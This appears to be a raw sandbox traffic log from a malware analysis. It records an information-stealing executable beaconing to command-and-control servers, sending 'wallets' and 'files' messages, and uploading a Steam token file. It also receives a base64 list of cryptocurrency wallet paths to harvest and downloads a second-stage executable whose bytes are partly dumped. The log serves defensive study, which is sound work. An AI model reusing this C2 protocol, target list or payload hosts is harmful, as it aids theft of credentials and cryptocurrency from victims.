                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.381359100 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="message"wallets------EBGDAAKJJDAAKFHJKJKF--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844160080 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:48 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Length: 2408
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.849450111 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 265
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="message"files------CFCBFHJECAKEHIECGIEB--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.311434031 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.324302912 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"------BKJKJEHJJDAKECBFCGID--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.325268984 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:49 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.354047060 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 272
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"ybncbhylepme------KKEHIEBKJKFIEBGDGDAA--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.816627026 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:50 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 68
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                        Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.549901185.215.113.16805480C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.942421913 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357429981 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:52 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 1916416
                                                                                                                                                                                                                                                        Last-Modified: Wed, 20 Nov 2024 22:52:31 GMT
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        ETag: "673e682f-1d3e00"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 20 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf L@PL@WkH0LL @.rsrcH@.idata @ @+@yasgrbfq 1 @lwauughoL@.taggant0 L"@
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357584953 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357620955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357656956 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357692003 CET1236INData Raw: 12 38 e0 7e c3 e6 10 49 64 19 f4 7a 07 1d 72 e5 b4 c5 58 3a 3d 73 1f ed d5 93 7b 9f d2 f7 6f ca 76 3b 03 f4 73 fb eb be cf 02 d4 bc 53 14 e3 e2 23 03 30 ff 1f 21 9f 69 75 04 60 4e cd 66 70 e9 53 77 c4 ad eb c2 94 ea c5 46 6e bc 93 04 a8 b0 c4 a2
                                                                                                                                                                                                                                                        Data Ascii: 8~IdzrX:=s{ov;sS#0!iu`NfpSwFn`J,&rW2wrx5cLa{;p+SqpvlbC&Wp>|_Swl'/X^cq;s?aG`*|3wtmbpj1$b
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357728004 CET1236INData Raw: 62 37 46 2f a3 4f a0 7c bb 5b 34 00 fb d2 f5 03 34 35 6c 12 c5 76 14 87 44 30 70 0a 58 7b 0f bf 43 15 c8 b6 95 db 78 75 56 59 1c b2 2c f7 8f 8e a7 96 f0 a9 cd 46 75 bb ab f5 ee 71 d2 63 f4 ca 73 37 7a ae b3 8b 2a dd f7 4a 71 16 a4 ba 54 9e 49 94
                                                                                                                                                                                                                                                        Data Ascii: b7F/O|[445lvD0pX{CxuVY,Fuqcs7z*JqTIx{9OVd~8F/KZ-ua[8CGF7m{a~<hm(Pfu8s<|i[ZxOt`xtOI_L~G6]n
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357762098 CET776INData Raw: e0 0e 17 23 8c 0c 14 89 8f 02 99 40 c5 14 38 ec fa aa 02 df 3e 87 3d 0f 33 1d 47 0b 7c 05 38 c4 a0 b4 21 d0 8f 1a 63 9d 7b 64 74 8b 72 9f 5d 7c 61 8b 16 2c 4b fa f5 af 84 db 04 bd f0 e7 c2 2a 4b 1c da 57 45 9f 54 8a aa 98 d8 8c 8b 28 1b 89 ff 57
                                                                                                                                                                                                                                                        Data Ascii: #@8>=3G|8!c{dtr]|a,K*KWET(W9b:sk!Rd.R&}jD:WLsPt$eUV^lQ$4:{r&^RA3yUXh%ZNdeM~Fzi@hRfY:Z9$nD
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357795954 CET1236INData Raw: 31 52 f1 4a 72 38 ed 80 8b a4 5b 55 20 55 ce 81 f2 c2 54 aa 5c f6 dc d9 a6 09 8b 31 fe 91 50 fd a1 f5 c4 c0 30 17 c7 ae a7 fd 42 11 f9 53 c5 e4 69 3a cc de 54 12 60 7c 3f 1e bd 84 18 4b 34 95 af 20 5a bc ed 12 73 e5 ba 08 97 fa 82 90 18 1f ae 06
                                                                                                                                                                                                                                                        Data Ascii: 1RJr8[U UT\1P0BSi:T`|?K4 ZsT]cqef@W~qSsWp!TvHK{89lC+s&",E Eel)MX~v|b2,eS*;n'm:D
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357830048 CET1236INData Raw: f6 18 b2 9a 27 76 d0 07 e7 51 78 be 56 98 dc ad 6a e5 a8 28 e0 db ac 5e a8 29 b6 e4 2c 25 5f 35 bd 6e ac 8c 03 83 8c de 26 76 1b 7a c8 36 6f 84 ca 83 99 ef b9 a7 98 bf b3 15 5f 82 7c 24 b9 72 7d 14 d6 36 c4 4b 44 3b 52 fd 91 3e 6c ab 31 04 5a bb
                                                                                                                                                                                                                                                        Data Ascii: 'vQxVj(^),%_5n&vz6o_|$r}6KD;R>l1ZX*E9[GTDe)>T:0H}-IWOm\f3"_>GT/Wb/&x+gSn_$_.F$<qOg#zw}
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357866049 CET1236INData Raw: 85 7f d8 9e 67 1b 81 c8 b3 20 55 45 de 67 28 9f c2 dd 27 be f1 ff 9d 52 ce 94 aa e1 b8 ba c6 23 8b f9 41 ec a8 fb ce a2 8b d1 54 e2 27 79 66 85 4b 87 a8 3a e8 0f db c3 9d 42 66 4f 1e a9 14 cb f3 7c 98 b8 e7 25 af 54 a8 7c 76 d2 d5 16 e7 a2 6e 44
                                                                                                                                                                                                                                                        Data Ascii: g UEg('R#AT'yfK:BfO|%T|vnDa#xJ*iWh)&YK@^84'\wUt~2^D+~|0p%gIc[#`_@~1`r,x}H.Dku|Ddl~_P'
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477550983 CET1236INData Raw: 77 b3 3a 35 5e bb f8 5b 63 2d 32 7e e2 c4 d7 3e 2c 48 34 79 13 dd 51 44 64 d3 54 47 8d 82 7a 5b b3 1a 32 81 16 48 3b 4b 6c 7b 9d cb 88 76 e7 b6 89 d9 60 85 2d 4f 85 83 39 69 4f 7b fa 07 d8 d7 8f 2e 52 44 17 0c dd bb a4 50 e2 d8 35 be 51 45 ab 7b
                                                                                                                                                                                                                                                        Data Ascii: w:5^[c-2~>,H4yQDdTGz[2H;Kl{v`-O9iO{.RDP5QE{l5hQ|7UDx2Vw8H~j'CP.xhq*/wJB4b}g<R.mz&eWo@pj;>Y>O:{@y_<A!TtxTr*


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        4192.168.2.549920185.215.113.206805480C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:56.203393936 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 272
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KEHDHIDAEHCFHJJJJECA--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:58.231559992 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:57 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.550089185.215.113.43805396C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:03.598757982 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:04.999270916 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:51:04 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        6192.168.2.550095185.215.113.43805396C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:06.623610020 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                                        Cache-Control: no-cache
